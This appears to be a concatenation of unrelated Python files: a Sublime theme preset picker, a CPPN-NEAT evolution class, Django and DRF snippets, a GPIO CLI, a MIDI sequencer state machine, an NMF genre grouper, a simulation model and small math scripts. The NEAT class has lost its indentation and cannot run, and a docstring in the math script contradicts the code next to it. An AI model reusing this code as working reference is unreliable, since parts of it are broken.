    'theme_statusbar_size_lg',
    'theme_statusbar_size_md',
    'theme_statusbar_size_sm',
    'theme_statusbar_size_xl',
    'theme_statusbar_size_xs',
    'theme_tab_arrows_hidden',
    'theme_tab_close_always_visible',
    'theme_tab_font_lg',
    'theme_tab_font_md',
    'theme_tab_font_sm',
    'theme_tab_font_xl',
    'theme_tab_font_xs',
    'theme_tab_highlight_text_only',
    'theme_tab_label_bold',
    'theme_tab_line_size_lg',
    'theme_tab_line_size_sm',
    'theme_tab_mouse_wheel_switch',
    'theme_tab_rounded',
    'theme_tab_selected_filled',
    'theme_tab_selected_label_bold',
    'theme_tab_selected_prelined',
    'theme_tab_selected_transparent',
    'theme_tab_selected_underlined',
    'theme_tab_separator',
    'theme_tab_size_lg',
    'theme_tab_size_md',
    'theme_tab_size_sm',
    'theme_tab_size_xl',
    'theme_tab_size_xs',
    'theme_tab_width_auto',
    'theme_tooltips_font_lg',
    'theme_tooltips_font_md',
    'theme_tooltips_font_sm',
    'theme_tooltips_font_xl',
    'theme_tooltips_font_xs'
]

# Named presets: preset name -> list of options to enable. Insertion order
# is the display order in the quick panel, hence the OrderedDict.
PRESETS = OrderedDict(
    [
        (
            'Default',
            []
        ),
        (
            'Atom',
            [
                'theme_accent_sky',
                'theme_button_rounded',
                'theme_find_panel_close_hidden',
                'theme_grid_border_size_lg',
                'theme_icon_button_highlighted',
                'theme_icons_atomized',
                'theme_popup_border_visible',
                'theme_scrollbar_rounded',
                'theme_sidebar_disclosure',
                'theme_sidebar_indent_top_level_disabled',
                'theme_tab_rounded',
                'theme_tab_selected_prelined',
                'theme_tab_separator'
            ]
        ),
        (
            'Predawn',
            [
                'theme_accent_tangerine',
                'theme_autocomplete_item_selected_colored',
                'theme_dirty_materialized',
                'theme_dropdown_atomized',
                'theme_icon_button_highlighted',
                'theme_panel_switcher_atomized',
                'theme_quick_panel_item_selected_colored',
                'theme_scrollbar_colored',
                'theme_scrollbar_line',
                'theme_sidebar_close_always_visible',
                'theme_sidebar_folder_atomized',
                'theme_sidebar_folder_mono',
                'theme_tab_close_always_visible',
                'theme_tab_line_size_lg',
                'theme_tab_selected_transparent',
                'theme_tab_selected_underlined'
            ]
        ),
        (
            'Material',
            [
                'theme_accent_lime',
                'theme_bar',
                'theme_bar_colored',
                'theme_bar_logo_atomized',
                'theme_button_rounded',
                'theme_icons_materialized',
                'theme_scrollbar_rounded',
                'theme_sidebar_highlight_selected_text_only',
                'theme_sidebar_highlight_text_only',
                'theme_sidebar_indent_top_level_disabled',
                'theme_tab_highlight_text_only',
                'theme_tab_line_size_lg',
                'theme_tab_selected_transparent',
                'theme_tab_selected_underlined'
            ]
        ),
        (
            'Code',
            [
                'theme_accent_purple',
                'theme_bar',
                'theme_sidebar_disclosure',
                'theme_sidebar_indent_sm',
                'theme_statusbar_colored',
                'theme_tab_highlight_text_only'
            ]
        )
    ]
)
def get_options(prefs):
    """Return the theme options currently enabled in *prefs*.

    Side effect: afterwards every known option is erased from *prefs* so a
    preset preview starts from a clean slate.
    """
    enabled = [name for name in OPTIONS if prefs.get(name) is True]
    erase_options(prefs)
    return enabled
def set_options(prefs, opts):
    """Enable each option name in *opts* on the settings object *prefs*."""
    for name in opts:
        prefs.set(name, True)
def erase_options(prefs):
    """Remove every known theme option from the settings object *prefs*."""
    for name in OPTIONS:
        prefs.erase(name)
def disable_preset(prefs, opts):
    """Erase the option names that belong to a single preset."""
    for name in opts:
        prefs.erase(name)
def revert_options(prefs, opts):
    """Restore *prefs* to exactly the option set in *opts* (clear, then set)."""
    erase_options(prefs)
    set_options(prefs, opts)
def preview_preset(prefs, opts):
    """Enable a preset's options in-memory (not persisted until commit())."""
    set_options(prefs, opts)
def activate_preset(prefs, opts):
    """Persist the currently previewed preset.

    *prefs* and *opts* are unused: the options were already applied by
    preview_preset() while highlighting; this only saves the settings file.
    """
    commit()
def commit():
    """Write the in-memory preferences back to the settings file on disk."""
    return sublime.save_settings(PREFERENCES)
class BoxyPresetsCommand(sublime_plugin.WindowCommand):
    """Quick-panel chooser that live-previews and applies Boxy theme presets."""

    def display_list(self, presets):
        """Open the quick panel listing *presets* (ordered name -> options map)."""
        self.presets = presets
        self.prefs = sublime.load_settings(PREFERENCES)
        # Snapshot the user's current options so a cancelled panel can restore
        # them. NOTE: get_options() also erases the options from the settings.
        self.initial_options = get_options(self.prefs)
        self.previous_index = -1
        self.quick_list = [preset for preset in self.presets]
        self.window.show_quick_panel(self.quick_list, self.on_done,
                                     on_highlight=self.on_highlighted)

    def on_highlighted(self, index):
        """Preview the highlighted preset, undoing the previously shown one."""
        # BUG FIX: the original called disable_preset()/preview_preset()
        # immediately and passed their None return values to
        # set_timeout_async() (which expects a callable); wrap the calls in
        # lambdas so they actually run on the async thread.
        if self.previous_index != -1:
            prev_opts = self._quick_list_to_preset(self.previous_index)
            sublime.set_timeout_async(lambda: disable_preset(self.prefs, prev_opts), 0)
        opts = self._quick_list_to_preset(index)
        sublime.set_timeout_async(lambda: preview_preset(self.prefs, opts), 0)
        self.previous_index = index

    def on_done(self, index):
        """Apply the chosen preset, or restore the initial options on cancel."""
        # `==` rather than `is`: identity comparison on ints is unreliable.
        if index == NO_SELECTION:
            revert_options(self.prefs, self.initial_options)
            return
        preset = self._quick_list_to_preset(index)
        activate_preset(self.prefs, preset)

    def _quick_list_to_preset(self, index):
        """Translate a quick-panel row index into its preset's option list."""
        return self.presets[self.quick_list[index]]

    def run(self):
        self.display_list(PRESETS)
|
import autodisc as ad
from autodisc.cppn.selfconnectiongenome import SelfConnectionGenome
import neat
import copy
import random
class TwoDMatrixCCPNNEATEvolution:
@staticmethod
def default_config():
    """Return the default configuration object for a CPPN-NEAT evolution run."""
    def_config = ad.Config()
    def_config.neat_config_file = 'neat.cfg'
    # Height/width of the 2-D matrix each CPPN is rendered into.
    def_config.matrix_size = (100, 100)
    # Coordinate range fed to the CPPN inputs along each matrix axis.
    def_config.cppn_input_borders = ((-2,2), (-2,2))
    def_config.recurrent_net_repetitions = 4 # number of iterations a recurrent neural network is executed
    def_config.n_generations = 1
    def_config.is_verbose = False
    def_config.is_extra_fitness_data = False # does the fitness function returns extra data that should be saved
    def_config.is_pytorch = True
    def_config.keep_results = 'none' # 'none', 'all_gen', 'last_gen'
    # Default fitness: [fitness(, data)] = f(matrix, genome(, param)); always 0.
    def_config.fitness_function = lambda matrix, genome: 0
    def_config.fitness_function_param = None
    return def_config
def __init__(self, init_population=None, config=None, **kwargs):
'''
Configuration:
keep_results: Defines if the results of the exploration should be kept.
Options:
- 'none' (default)
- 'all_gen': keep results from all generations
- 'last_gen': keep results from last generation
fitness_function: Function pointer to fitness function. Form: [fitness (,data)] = fitness_function(matrix, genome (, fitness_function_param)).
Set config.is_extra_fitness_data to True if extra data is returned.
fitness_function_param: Optional parameter for the fitness function. Can be used to configure the function.
:param init_population: List of genomes that are used as initial population.
If less are given than pop_size, the others are randomly generated. If more are given, then the elements will be randomly chosen.
:param config: Configuration
'''
self.config = ad.config.set_default_config(kwargs, config, TwoDMatrixCCPNNEATEvolution.default_config())
if init_population is not None and not isinstance(init_population, list):
init_population = [init_population]
self.generation = -1
self.neat_config = neat.Config(SelfConnectionGenome,
neat.DefaultReproduction,
neat.DefaultSpeciesSet,
neat.DefaultStagnation,
self.config.neat_config_file)
# add userdefined activation functions
self.neat_config.genome_config.add_activation('delphineat_gauss', ad.cppn.activations.delphineat_gauss_activation)
self.neat_config.genome_config.add_activation('delphineat_sigmoid', ad.cppn.activations.delphineat_sigmoid_activation)
# regular neat evolution can not handle population size of 1
if self.neat_config.pop_size == 1:
self.is_single_cppn_evolution = True
# population is a single genome
if init_population is None:
self.population = self.neat_config.genome_type(0)
self.population.configure_new(self.neat_config.genome_config)
else:
self.population = copy.deepcopy(random.choice(init_population))
# hold best genome here
if self.neat_config.fitness_criterion == 'max':
self.fitness_criterion = lambda g1, g2: g2 if g2.fitness > g1.fitness else g1
elif self.neat_config.fitness_criterion == 'min':
self.fitness_criterion = lambda g1, g2: g2 if g2.fitness < g1.fitness else g1
else:
raise ValueError('Usupported fitness criterion {!r}! Evolutions with population size of 1 supports only \'min\' or \'max\'.'.format(self.neat_config.fitness_criterion))
self.best_genome = self.population
else:
self.is_single_cppn_evolution = False
if init_population is None:
self.population = neat.Population(self.neat_config)
else:
# if more elements in init list than population size, use random order
if len(init_population) <= self.neat_config.pop_size:
init_population_tmp = init_population
else:
init_population_tmp = random.shuffle(init_population.copy())
population = {}
# if there are randomly generated genomes, use for their keys new keys
next_key = max([genome.key for genome in init_population_tmp]) + 1
for idx in range(self.neat_config.pop_size):
if idx < len(init_population_tmp):
genome = copy.deepcopy(init_population_tmp[idx])
else:
genome = self.neat_config.genome_type(0)
genome.configure_new(self.neat_config.genome_config)
genome.key = next_key
next_key += 1
population[genome.key] = genome
species = config.species_set_type(self.neat_config.species_set_config, neat.reporting.ReporterSet())
species.speciate(neat.config, population, 0)
initial_state = (population, species, 0)
self.population = neat.Population(self.neat_config, initial_state)
for genome_key in population.keys():
self.population.population.reproduction.ancestors[genome_key] = tuple()
if self.config['is_verbose'] and not self.is_single_cppn_evolution:
# Add a stdout reporter to show progress in the terminal.
self.population.add_reporter(neat.StdOutReporter(True))
self.statistics_reporter = neat.StatisticsReporter()
self.population.add_reporter(self.statistics_reporter)
# save some config parametrs as variables for increased performance
self.matrix_size = self.config.matrix_size
self.recurrent_net_repetitions = self.config.recurrent_net_repetitions
self.is_extra_fitness_data = self.config.is_extra_fitness_data
if self.config.keep_results.lower() == 'none':
self.is_keep_all_gen_results = False
self.is_keep_last_gen_results = False
elif self.config.keep_results.lower() == 'all_gen':
self.is_keep_all_gen_results = True
self.is_keep_last_gen_results = False
elif self.config.keep_results.lower() == 'last_gen':
self.is_keep_all_gen_results = False
self.is_keep_last_gen_results = True
else:
raise ValueError('Unknown keep_results configuration {!r}!. Allowed values: none, all_gen, last_gen', self.config.keep_results)
if self.is_keep_last_gen_results or self.is_keep_all_gen_results:
self.results = dict()
else:
self.results = None
self.net_input = ad.cppn.helper.create_image_cppn_input(self.matrix_size, input_borders=self.config.cppn_input_borders)
def get_best_genome(self):
if self.is_single_cppn_evolution:
return self.best_genome
else:
return self.population.best_genome
def get_best_genome_last_generation(self):
if self.is_single_cppn_evolution:
return self.population
else:
max_fitness = float('-inf')
max_fitness_idx = None
for idx, genome in enumerate(self.population):
if genome.fitness > max_fitness:
max_fitness = genome.fitness
max_fitness_idx = idx
return self.population[max_fitness_idx]
def get_best_matrix(self):
# TODO: save best matrix immediately after it was generated, so that this computation can be avoided
best_genome = self.get_best_genome()
return self.genome_to_matrix(best_genome, self.neat_config)
def get_best_matrix_last_generation(self):
# TODO: save best matrix immediately after it was generated, so that this computation can be avoided
best_genome = self.get_best_genome_last_generation()
return self.genome_to_matrix(best_genome, self.neat_config)
def do_evolution(self, n_generations=None):
self.generation = -1
# use default number from config if nothing is given
if n_generations is None:
n_generations = self.config.n_generations
for _ in range(n_generations):
self.do_next_generation()
def do_next_generation(self):
self.generation += 1
if self.is_single_cppn_evolution:
# use the initialized genome for the first generation
if self.generation > 0:
self.population = copy.deepcopy(self.population)
self.population.key = self.generation
self.population.mutate(self.neat_config.genome_config)
self.eval_population_fitness([(self.population.key, self.population)], self.neat_config)
# update best genome according to the fitness criteria
self.best_genome = self.fitness_criterion(self.best_genome, self.population)
else:
self.population.run(self.eval_population_fitness, 1)
if self.is_keep_last_gen_results and self.generation > 0:
del(self.results[self.generation-1])
def eval_population_fitness(self, genomes, neat_config):
if self.is_keep_last_gen_results or self.is_keep_all_gen_results:
results = []
for (genome_id, genome) in genomes:
mat = self.genome_to_matrix(genome, neat_config)
if (self.is_keep_last_gen_results or self.is_keep_all_gen_results) and self.is_extra_fitness_data:
if self.config.fitness_function_param is None:
[genome.fitness, extra_data] = self.config.fitness_function(mat, genome)
else:
[genome.fitness, extra_data] = self.config.fitness_function(mat, genome, self.config.fitness_function_param)
else:
if self.config.fitness_function_param is None:
genome.fitness = self.config.fitness_function(mat, genome)
else:
genome.fitness = self.config.fitness_function(mat, genome, self.config.fitness_function_param)
if self.is_keep_last_gen_results or self.is_keep_all_gen_results:
result = dict()
result['id'] = genome.key
result['genome'] = genome
result['matrix'] = mat
result['fitness'] = genome.fitness
if self.is_extra_fitness_data:
result['data'] = extra_data
results.append(result)
if self.is_keep_last_gen_results or self.is_keep_all_gen_results:
self.results[self.generation] = results
def genome_to_matrix(self, genome, neat_config):
if self.config['is_pytorch']:
if neat_config.genome_config.feed_forward:
raise NotImplementedError('Feedforward networks for pytorch are not implemented!')
else:
net = ad.cppn.pytorchcppn.RecurrentCPPN.create_from_genome(genome, neat_config)
net_output = net.activate(self.net_input, self.recurrent_net_repetitions)
else:
if neat_config.genome_config.feed_forward:
net = neat.nn.FeedForwardNetwork.create(genome, neat_config)
net_output = ad.cppn.helper.calc_neat_forward_image_cppn_output(net, self.net_input)
else:
net = neat.nn.RecurrentNetwork.create(genome, neat_config)
net_output = ad.cppn.helper.calc_neat_recurrent_image_cppn_output(net, self.net_input, self.recurrent_net_repetitions)
mat = ad.cppn.helper.postprocess_image_cppn_output(self.matrix_size, net_output)
return mat |
from rest_framework import serializers
from film.models import origin
class originSerializers(serializers.ModelSerializer):
    """DRF serializer exposing every field of the film.origin model."""
    class Meta:
        model = origin
        fields = '__all__'
class originOnSerializers(serializers.ModelSerializer):
    """Lightweight DRF serializer exposing only the origin's name."""
    class Meta:
        model = origin
        fields = ['name']
|
"""
This module will manage Command Line Interface (CLI) for gpio-monitor.
It will parse argument and build a configuration reference for gpio-monitor.
For more information about argparse, see https://docs.python.org/3/library/argparse.html
"""
import argparse
class Config:  # pylint: disable=too-few-public-methods
    """
    Store the configuration given by the user on the command line.
    """

    def __init__(self):
        """
        Parse the command-line arguments and build the configuration mapping.
        """
        # BUG FIX: user-facing typo 'Rasberry' -> 'Raspberry'
        parser = argparse.ArgumentParser(description='monitor some GPIO from Raspberry Pi')
        parser.add_argument('--led', metavar='led', type=int,
                            help='led pin number')
        parser.add_argument('--button', metavar='button', type=int,
                            help='button pin number')
        options = parser.parse_args()
        self.config = {
            'led': options.led,
            'button': options.button
        }

    def display(self):
        """
        Print the current configuration, one item per line.
        """
        print('Configuration items')
        for item, value in self.config.items():
            print('{}: {}'.format(item, value))
|
from django.apps import AppConfig
class MusicrunConfig(AppConfig):
    """Django application configuration for the musicRun app."""
    name = 'musicRun'
|
import math
a = 1
b = 1
# a and b are both 1, so this message always prints
if a == b:
    print ('1 through 10')
# count down from 10 to 1, one number per line
# (same output as the original decrement-then-print while loop)
for a in range(10, 0, -1):
    print(a)
def factorial(a):
    """Return a! for a non-negative integer *a*; 0! and 1! are both 1.

    BUG FIX: the original returned 0 for factorial(0) because its while
    loop never ran and the unchanged argument (0) was returned, which made
    nchoosek(n, n) divide by zero.
    """
    result = 1
    for factor in range(2, a + 1):
        result *= factor
    return result
# 11! == 39916800, using the factorial() defined above
print(factorial(11))
def nchoosek(n, k):
    """Return the binomial coefficient C(n, k) as a float.

    Uses math.factorial (imported at the top of this script) so the result
    is correct even for k == 0 or k == n -- the script's own factorial()
    returns 0 for factorial(0), which would divide by zero here.
    """
    f = math.factorial(n) / (math.factorial(n - k) * math.factorial(k))
    return f
# C(5, 2) == 10
print(nchoosek(5,2))
# cos(pi) == -1.0
print(math.cos(math.pi))
|
from manta import note_from_pad, OFF, AMBER, RED, pad_from_note
class MantaSeqState(object):
    """Base class for MantaSeq UI states (state-machine pattern).

    Every ``process_*`` hook is a no-op here; concrete states override
    only the events they care about.  Shared helpers for LED intensity
    and step pre-filling live on this base class.
    """

    def __init__(self, manta_seq):
        # back-reference to the owning MantaSeq controller
        self.manta_seq = manta_seq

    # --- event hooks (overridden by subclasses as needed) ---

    def process_step_press(self, step_num):
        pass

    def process_step_release(self, step_num):
        pass

    def process_shift_press(self):
        pass

    def process_shift_release(self):
        pass

    def process_note_value(self, note_pad, value):
        pass

    def process_note_velocity(self, note_pad, velocity):
        pass

    def process_slider_value(self, slider_num, value):
        pass

    def process_slider_release(self, slider_num):
        pass

    # --- shared helpers ---

    def set_note_intensity_from_step_num(self, step_num, on):
        '''if on is True, the intensity is set from the steps velocity.
        if on is False, the intensity is set to zero'''
        # NOTE(review): steps with velocity == 0 are skipped entirely, so
        # their pads are never explicitly turned off here -- possibly
        # related to the stuck-pad TODO in MantaSeqStepsSelectedState.
        step = self.manta_seq._seq.steps[step_num]
        if step.velocity > 0:
            if on:
                intensity = step.velocity
            else:
                intensity = 0
            pad_num = pad_from_note(step.note)
            self.manta_seq.set_pad_intensity(pad_num, intensity)

    def prefill_steps(self):
        '''
        If the mantaseq has any notes or sliders already selected,
        assign them to the notes.
        '''
        # _selected_note is a (note_number, velocity) tuple or None
        selected_note = self.manta_seq._selected_note
        if selected_note is not None:
            self.manta_seq._seq.set_note(selected_note[0])
            self.manta_seq._seq.set_velocity(selected_note[1])
        selected_cc1 = self.manta_seq._selected_cc1
        if selected_cc1 is not None:
            self.manta_seq._seq.set_cc1(selected_cc1)
        selected_cc2 = self.manta_seq._selected_cc2
        if selected_cc2 is not None:
            self.manta_seq._seq.set_cc2(selected_cc2)
class MantaSeqIdleState(MantaSeqState):
    """State with no step pads held: note pads play directly and sliders
    drive the global CC values."""

    def process_step_press(self, step_num):
        seq = self.manta_seq
        seq._seq.select_step(step_num)
        self.set_note_intensity_from_step_num(step_num, True)
        self.prefill_steps()
        if seq._selected_note is not None:
            seq.set_pad_active(step_num, True)
        # holding a step moves us into the steps-selected state
        seq._state = MantaSeqStepsSelectedState(seq)

    def process_shift_press(self):
        self.manta_seq._state = MantaSeqShiftedState(self.manta_seq)

    def process_note_velocity(self, pad_num, velocity):
        # pass the note straight through to MIDI
        self.manta_seq._send_midi_note(note_from_pad(pad_num), velocity)

    def process_note_value(self, pad_num, value):
        note = note_from_pad(pad_num)
        # remember the held note (or clear it when the pad is released)
        self.manta_seq._selected_note = (note, value) if value > 0 else None

    def process_slider_value(self, slider_num, value):
        cc_value = int(value * 127)
        if slider_num == 0:
            self.manta_seq._global_cc1 = cc_value
            self.manta_seq._selected_cc1 = cc_value
        else:
            self.manta_seq._global_cc2 = cc_value
            self.manta_seq._selected_cc2 = cc_value
        self.manta_seq._send_midi_cc(slider_num + 1, cc_value)

    def process_slider_release(self, slider_num):
        attr = '_selected_cc1' if slider_num == 0 else '_selected_cc2'
        setattr(self.manta_seq, attr, None)
class MantaSeqStepsSelectedState(MantaSeqState):
    """State while one or more step pads are held: note pads and sliders
    edit the held steps instead of playing live."""

    def process_step_press(self, step_num):
        # add the step to the selection and light it up
        self.manta_seq._seq.select_step(step_num)
        self.set_note_intensity_from_step_num(step_num, True)
        self.prefill_steps()
        if self.manta_seq._selected_note is not None:
            self.manta_seq.set_pad_active(step_num, True)

    def process_step_release(self, step_num):
        self.manta_seq._seq.deselect_step(step_num)
        self.set_note_intensity_from_step_num(step_num, False)
        # fall back to the idle state once no steps remain held
        if len(self.manta_seq._seq.selected_steps) == 0:
            self.manta_seq._state = MantaSeqIdleState(self.manta_seq)
            # TODO: make sure all pads have intensity of 0, otherwise they
            # could get stuck on, as the intensity doesn't get updated unless
            # there are steps selected
    def process_note_value(self, pad_num, value):
        # assign the played note/velocity to every selected step
        note_num = note_from_pad(pad_num)
        self.manta_seq._seq.set_note(note_num)
        self.manta_seq._seq.set_velocity(value)
        # note - this isn't very efficient. if necessary we should
        # use the set_row_led API call
        for i in range(48):
            if i != pad_num:
                self.manta_seq.set_pad_intensity(i, 0)
        self.manta_seq.set_pad_intensity(pad_num, value)
        if value > 0:
            self.manta_seq._selected_note = (note_num, value)
        else:
            self.manta_seq._selected_note = None
        # then update the pad colors of any selected pads
        for i, step in enumerate(self.manta_seq._seq.steps):
            if step in self.manta_seq._seq.selected_steps:
                active = (value > 0)
                self.manta_seq.set_pad_active(i, active)

    def process_slider_value(self, slider_num, value):
        # sliders edit the selected steps' CC values (scaled to MIDI 0-127)
        if slider_num == 0:
            self.manta_seq._seq.set_cc1(int(value * 127))
        else:
            self.manta_seq._seq.set_cc2(int(value * 127))
class MantaSeqShiftedState(MantaSeqState):
    """State while the shift pad is held: slider 0 enters tempo
    adjustment and step presses erase steps."""

    def process_shift_release(self):
        self.manta_seq._state = MantaSeqIdleState(self.manta_seq)

    def process_slider_value(self, slider_num, value):
        if slider_num != 0:
            return
        # slider 0 under shift hands control to the tempo-adjust state
        self.manta_seq._state = MantaSeqTempoAdjustState(
            self.manta_seq, value,
            self.manta_seq.step_duration)

    def process_step_press(self, step_num):
        '''Shifted step select erases that note'''
        seq = self.manta_seq
        seq.set_pad_active(step_num, False)
        # select the step, zero all of its data, then deselect it again
        seq._seq.select_step(step_num)
        seq._seq.set_velocity(0)
        seq._seq.set_cc1(0)
        seq._seq.set_cc2(0)
        seq._seq.deselect_step(step_num)
class MantaSeqTempoAdjustState(MantaSeqState):
    """Entered when slider 0 moves while shift is held: slider motion
    scales the step duration exponentially around its starting value."""

    def __init__(self, manta_seq, slide_begin, initial_duration):
        'Takes the initial value of the slider so we can reference against it'
        super(MantaSeqTempoAdjustState, self).__init__(manta_seq)
        self.slide_begin = slide_begin
        self.initial_duration = initial_duration

    def process_shift_release(self):
        self.manta_seq._state = MantaSeqIdleState(self.manta_seq)

    def process_slider_value(self, slider_num, value):
        if slider_num != 0:
            return
        # the exponent lies between -1 and 1; we are scaling *duration*
        # (not tempo), hence slide_begin - value rather than the reverse
        exponent = self.slide_begin - value
        self.manta_seq.step_duration = self.initial_duration * 2 ** exponent

    def process_slider_release(self, slider_num):
        self.manta_seq._state = MantaSeqShiftedState(self.manta_seq)
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 12 19:19:35 2015
@author: LIght
"""
from sklearn.decomposition import ProjectedGradientNMF
import utility
import numpy as np
import pandas as pd
##use of NMF
class NMF:
    """Group movies into latent 'genres' via non-negative matrix factorization."""

    @staticmethod
    def groupMovieGenre(user_item_matrix, item_df):
        """Factor the user-item matrix into 50 latent components and relate
        each component to the explicit movie genres.

        :param user_item_matrix: 2D array-like of user-by-item ratings.
        :param item_df: DataFrame of per-movie metadata, including one 0/1
            column per genre in ``movie_genre`` below (assumed aligned with
            the item axis of user_item_matrix -- TODO confirm).
        :return: (ret, movie) -- ret: per-latent-component genre sums;
            movie: per-movie component loadings concatenated with item_df.
        """
        genre_num = 50
        A = np.array(user_item_matrix)
        nmf_model = ProjectedGradientNMF(n_components=genre_num, init='random', random_state=0)
        # A single fit is enough to populate components_; the original
        # fitted twice via fit() followed by fit_transform() and never used
        # the transformed user matrix.
        nmf_model.fit(A)
        # H: latent-component-by-item matrix (semantic item info)
        H = nmf_model.components_
        # movie: one row per movie -- its loading on each latent component
        # plus the explicit metadata columns from item_df
        movie = pd.DataFrame(H).T
        movie = pd.concat([movie, item_df], axis=1)
        movie_genre = ['Action', 'Adventure', 'Animation', 'Children', 'Comedy', 'Crime', 'Documentary', 'Drama', 'Fantasy', 'Film-Noir', 'Horror', 'Musical', 'Mystery', 'Romance', 'Sci-Fi', 'Thriller', 'War', 'Western']
        # for each latent component, sum the genre flags of the movies that
        # load strongly (> 5) on it
        ret = pd.DataFrame(movie[movie[0] > 5][movie_genre].sum(axis=0))
        for i in range(genre_num):
            ret[str(i)] = pd.DataFrame(movie[movie[i] > 5][movie_genre].sum(axis=0))
        # BUG FIX: the original returned the undefined names ret_nmf and
        # movie_nmf, which raised NameError on every call.
        return ret, movie
|
import controller
import model # See how update_all should pass on a reference to this module
#Use the reference to this module to pass it to update methods
from ball import Ball
from floater import Floater
from blackhole import Black_Hole
from pulsator import Pulsator
from hunter import Hunter
from special import Special
# Global variables: declare them global in functions that assign to them: e.g., ... = or +=
running = False
cycle_count = 0
simultons = set()
current_action = None #used to remember what object to add/remove
#return a 2-tuple of the width and height of the canvas (defined in the controller)
def world():
    """Return (width, height) of the controller's canvas in pixels."""
    canvas = controller.the_canvas
    return (canvas.winfo_width(), canvas.winfo_height())
#reset all module variables to represent an empty/stopped simulation
def reset():
    """Return the simulation to its initial, stopped, empty state."""
    global running, cycle_count, simultons
    simultons = set()
    cycle_count = 0
    running = False
#start running the simulation
def start():
    """Un-pause the simulation loop."""
    global running
    running = True
#stop running the simulation (freezing it)
def stop():
    """Pause the simulation loop, freezing all simultons in place."""
    global running
    running = False
#step just one update in the simulation
def step():
    """Advance the simulation by exactly one cycle, then freeze it."""
    global cycle_count, running
    cycle_count += 1
    for simulton in simultons:
        simulton.update(model)
    running = False
#remember the kind of object to add to the simulation when an (x,y) coordinate in the canvas
# is clicked next (or remember to remove an object by such a click)
def select_object(kind):
    """Remember which kind of simulton the next canvas click should create
    (or 'Remove', meaning the next click deletes hit simultons)."""
    global current_action
    current_action = kind
#add the kind of remembered object to the simulation (or remove all objects that contain the
# clicked (x,y) coordinate
def mouse_click(x, y):
    """Handle a canvas click: remove every simulton containing (x, y), or
    add one simulton of the remembered kind at (x, y)."""
    if current_action == 'Remove':
        # collect first, then remove: mutating the set while iterating it
        # would raise RuntimeError
        objs_to_remove = [s for s in simultons if s.contains((x, y))]
        for obj in objs_to_remove:
            remove(obj)
    else:
        # Dispatch table instead of the original if/elif chain -- scales by
        # adding one entry (the original comment suggested eval; a dict is
        # safer and just as extensible).
        constructors = {
            'Ball': Ball,
            'Floater': Floater,
            'Black_Hole': Black_Hole,
            'Pulsator': Pulsator,
            'Hunter': Hunter,
            'Special': Special,
        }
        constructor = constructors.get(current_action)
        if constructor is not None:
            simultons.add(constructor(x, y))
        # otherwise: not a valid kind for this click; do nothing
#add simulton s to the simulation
def add(s):
    """Register simulton *s* with the running simulation."""
    simultons.add(s)
# remove simulton s from the simulation
def remove(s):
    """Drop simulton *s* from the simulation (raises KeyError if absent)."""
    simultons.remove(s)
#find/return a set of simultons that each satisfy predicate p
def find(p):
    """Return the set of all simultons for which predicate *p* is truthy."""
    return {simulton for simulton in simultons if p(simulton)}
#call update for each simulton in this simulation (pass model as an argument)
#this function should loop over one set containing all the simultons
# and should not call type or isinstance: let each simulton do the
# right thing for itself, without this function knowing what kinds of
# simultons are in the simulation
def update_all():
    """Advance one cycle: call update(model) on every simulton while running."""
    global cycle_count
    try:
        if running:
            cycle_count += 1
            # iterate a snapshot: an update() may add/remove simultons, and
            # mutating the set mid-iteration would raise RuntimeError
            for simulton in list(simultons):
                simulton.update(model)
    except Exception:
        # Best-effort: keep the animation loop alive even if an update
        # fails.  (The original used a bare except, which also swallowed
        # KeyboardInterrupt and SystemExit.)
        pass
#For animation: (1st) delete all simultons on the canvas; (2nd) call display on
# all simulton being simulated, adding each back to the canvas, maybe in a
# new location; (3rd) update the label defined in the controller for progress
def display_all():
    """Redraw the canvas: clear it, let every simulton draw itself (no
    type/isinstance checks -- each simulton knows how), then refresh the
    progress label."""
    canvas = controller.the_canvas
    for item in canvas.find_all():
        canvas.delete(item)
    for simulton in simultons:
        simulton.display(canvas)
    controller.the_progress.config(text=str(len(simultons)) + " simultons/" + str(cycle_count) + " cycles")
|
def mintot(triangle):
    """Return the minimal top-to-bottom path sum through *triangle*.

    *triangle* is a list of rows where row i has i+1 entries; a path moves
    from a cell to one of the two adjacent cells in the row below.

    The original recursed on the two sub-triangles of every cell,
    recomputing overlapping subproblems (exponential time); this bottom-up
    dynamic program is O(n^2) and returns the same values.
    """
    if not triangle:
        # preserve the original's behavior for an empty input, which fell
        # through every branch and returned None
        return None
    # best[j]: minimal path sum starting at column j of the current row
    best = list(triangle[-1])
    for row in range(len(triangle) - 2, -1, -1):
        best = [triangle[row][col] + min(best[col], best[col + 1])
                for col in range(row + 1)]
    return best[0]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.